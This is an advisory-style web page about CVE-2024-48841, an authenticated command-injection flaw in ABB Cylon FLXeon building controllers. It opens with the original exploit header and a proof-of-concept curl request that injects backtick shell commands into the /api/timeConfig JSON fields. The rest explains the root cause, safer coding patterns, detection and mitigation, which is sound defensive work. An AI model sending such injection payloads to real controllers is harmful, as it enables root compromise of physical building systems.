ABB Cylon FLXeon 9.3.4 - Remote Code Execution (Authenticated)

Exploit Author: LiquidWorm Analysis Author: www.bubbleslearn.ir Category: Language: JavaScript Published Date: 2025-04-11 
# Exploit Title: ABB Cylon FLXeon 9.3.4 - Remote Code Execution (Authenticated)
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb                   
# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series)
                  CBX Series (FLX Series)
                  CBT Series
                  CBV Series
                  Firmware: <=9.3.4

Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a
series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™
building management solutions. ABB BACnet controllers are designed for intelligent
control of HVAC equipment such as central plant, boilers, chillers, cooling towers,
heat pump systems, air handling units (constant volume, variable air volume, and
multi-zone), rooftop units, electrical systems such as lighting control, variable
frequency drives and metering.

The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented
connectivity and open integration for your building automation systems. It's scalable,
and modular, allowing you to control a diverse range of HVAC functions.

Desc: The ABB Cylon FLXeon BACnet controller is vulnerable to authenticated remote root
code execution via the /api/timeConfig endpoint. An attacker with valid credentials
can inject arbitrary system commands by manipulating parameters such as tz, timeServerYN,
and multiple timeDate fields. The vulnerability exists due to improper input validation
in timeConfig.js, where user-supplied data is executed via ChildProcess.exec() without
adequate sanitization.

Tested on: Linux Kernel 5.4.27
           Linux Kernel 4.15.13
           NodeJS/8.4.0
           Express


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5910
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5910.php
CVE ID: CVE-2024-48841
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48841


21.04.2024

--


$ cat project

                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░


$ curl -k -X PUT "https://7.3.3.1/api/timeConfig" \
> -H "Cookie: user_sid=xxx" \
> -H "Content-Type: application/json" \
> -d '{"timeConfig":{"timeDate":{\
> "yy":"`sleep 17`",\
> "mm":"`sleep 17`",\
> "dd":"`sleep 17`",\
> "h":"`sleep 17`",\
> "m":"`sleep 17`",\
> "s":"`sleep 17`"},\
> "tz":"`sleep 17`",\
> "tzList":[],\
> "timeServerYN":"`sleep 17`",\
> "timeServer":"1.1.1.1",\
> "timeServerSync":false}}'


Overview — ABB Cylon FLXeon 9.3.4 Authenticated Remote Code Execution (CVE-2024-48841)

In April 2024 a critical authenticated remote code execution vulnerability (CVE-2024-48841) was disclosed affecting ABB Cylon FLXeon and related BACnet building controllers running firmware versions up to and including 9.3.4. The issue allows an authenticated user to inject and execute arbitrary shell commands through a web API responsible for time configuration. The root cause is improper input validation combined with the use of Node.js APIs that execute shell commands with untrusted input.

Quick facts

  • Vendor: ABB Ltd.
  • Affected: FLXeon Series (FBXi/FBTi/FBVi), CBX/CBT/CBV Series — firmware <= 9.3.4
  • CVE: CVE-2024-48841
  • Advisory: ZSL-2025-5910 (ZeroScience)
  • Risk: High — remote root-level command execution after authentication

Technical summary

The device exposes a REST API endpoint used to configure system time and time zones. In the vulnerable versions, parameters submitted by an authenticated user are concatenated or interpolated into a command string that is executed via Node.js child process functions (for example, child_process.exec()). Because inputs are not validated or sanitized and are passed into a shell context, an attacker with valid credentials can inject shell meta-characters or additional commands, resulting in arbitrary command execution with system privileges.

Why this happens (root cause)

  • Use of child_process.exec() or equivalent to run system utilities where the command string includes user-supplied values.
  • Lack of input validation or a strict whitelist for fields such as time zone (tz), time server flag (timeServerYN), and date/time components.
  • Web UI/API allows authenticated users to supply text fields that are directly used in shell command composition.

Impact

Exploitation can yield full system compromise of the affected controller, typically allowing:

  • Execution of arbitrary system commands as the process owner (often root on embedded devices).
  • Persistence via modification of startup scripts or scheduled tasks.
  • Lateral movement within a building management network, exposure of credential stores, or manipulation of HVAC/lighting control logic.
  • Operational disruption of critical building systems.

Responsible disclosure & references

Safe technical explanation (non-actionable)

At a high level, vulnerable code performs these steps:

  • Accepts a JSON payload from an authenticated admin user containing time configuration fields.
  • Builds a shell command string that applies the time/timezone configuration by interpolating fields from the JSON payload.
  • Invokes the shell using child_process.exec() (or equivalent), which executes the composed string in a shell interpreter.
  • Because user data is included verbatim, shell metacharacters can change the command flow and inject additional commands.

Illustrative (non-exploitable) pseudocode showing the dangerous pattern

// DANGEROUS PATTERN (illustrative pseudocode, not an exploit)
const { exec } = require('child_process');

function applyTimeConfig(userInput) {
  // userInput.tz is taken directly from the user and embedded into a shell command
  const cmd = `set-timezone ${userInput.tz} && set-timeserver ${userInput.timeServer}`;
  exec(cmd, (err, stdout, stderr) => {
    // handle results
  });
}

Explanation: This pseudocode demonstrates the pattern that leads to command injection: user-controlled values are embedded into a shell command string passed to a function that spawns a shell. If an attacker can control userInput.tz, they can inject shell syntax that appends new commands. The code above is intentionally generic and safe to read; it does not provide an exploit payload.

Recommended secure replacement (principles)

// SECURE PATTERN (recommended)
const { spawn } = require('child_process');

function applyTimeConfigSafe(validated) {
  // validated.tz and validated.timeServer are pre-validated / whitelisted
  // Use spawn with argument array to avoid a shell interpreter
  const args = ['--timezone', validated.tz, '--server', validated.timeServer];
  const proc = spawn('timedate-utility', args, { stdio: 'inherit' });
  proc.on('error', (err) => { /* handle error */ });
  proc.on('exit', (code) => { /* handle exit */ });
}

Explanation: This pattern avoids invoking a shell by using child_process.spawn with an array of arguments. It also assumes inputs have been validated and/or whitelisted first. Using execFile or spawn with explicit argument arrays substantially reduces the risk of injection because the platform does not perform shell parsing on the argument string.

Detection and monitoring guidance

  • Monitor web server and application logs for calls to the time-config API from administrative accounts followed by unexpected process launches or unusual system activity.
  • Search for abnormal child processes spawned by the web application process or the presence of added startup items, new accounts, or modified config files.
  • Create SIEM alerts for sudden outbound connections from controllers (e.g., NTP/DNS/HTTP traffic that doesn't match normal patterns) or for use of uncommon utilities.
  • Look for high-frequency or repeated time-config modification attempts that may indicate brute-force testing of injection payloads.

Mitigation and remediation

Immediate and long-term mitigations:

  • Patch: Apply vendor-supplied firmware updates as soon as they are available. Firmware updates that remove the unsafe command execution are the primary remediation.
  • Least privilege: Restrict web administration access to management networks only (segmentation) and use strong authentication and session controls.
  • Limit admin accounts: Ensure only trusted personnel have accounts that can reach management APIs; rotate and centralize credentials.
  • Network controls: Block unnecessary outbound network access from controllers and limit which IPs can reach administrative endpoints (IP whitelisting/VPN).
  • Input validation: For developers: implement strict whitelists for time zone values and boolean flags; reject inputs containing shell metacharacters or unexpected characters.
  • Safe APIs: For developers: avoid child_process.exec(); use execFile/execFileSync or spawn with argument arrays and properly validate inputs.
  • WAF/IPS: Create rules to detect and block suspicious payload patterns against the affected endpoint and to inspect for shell metacharacters in admin payloads.

Secure coding checklist for vendors and integrators

  • Never pass untrusted input to a shell. Prefer programmatic APIs that accept separate arguments.
  • Whitelist accepted time zones and accept only canonical identifiers.
  • Validate numeric fields (year/month/day/hour/minute/second) against reasonable ranges.
  • Use parameterized operations or native library calls rather than invoking external utilities when possible.
  • Perform code reviews focused on use of OS command APIs and sanitize any remaining call sites.
  • Include unit tests and fuzz tests for API endpoints that accept administrative input.

Example deployment hardening checklist for operators

TaskWhy it matters
Apply firmware updatesFixes the underlying issue in vendor code
Isolate building controllers from general IT networksLimits attack surface and lateral movement
Restrict admin API access via ACLs/VPNReduces the pool of potential attackers
Enable logging and centralized monitoringAllows timely detection of suspicious activity
Regularly audit admin accounts and sessionsPrevents misuse of legitimate credentials

Final notes and best practices

Embedded building controllers are high-value targets because compromise can impact physical systems and occupant safety. Treat management interfaces as high-risk assets: limit exposure, require strong authentication, and keep software up to date. From a development perspective, avoid patterns that build shell commands from user input; from an operations perspective, minimize network exposure and monitor for anomalous behavior.

For more details, consult the ZeroScience advisory and the CVE entry for CVE-2024-48841 for timeline and vendor mitigation guidance.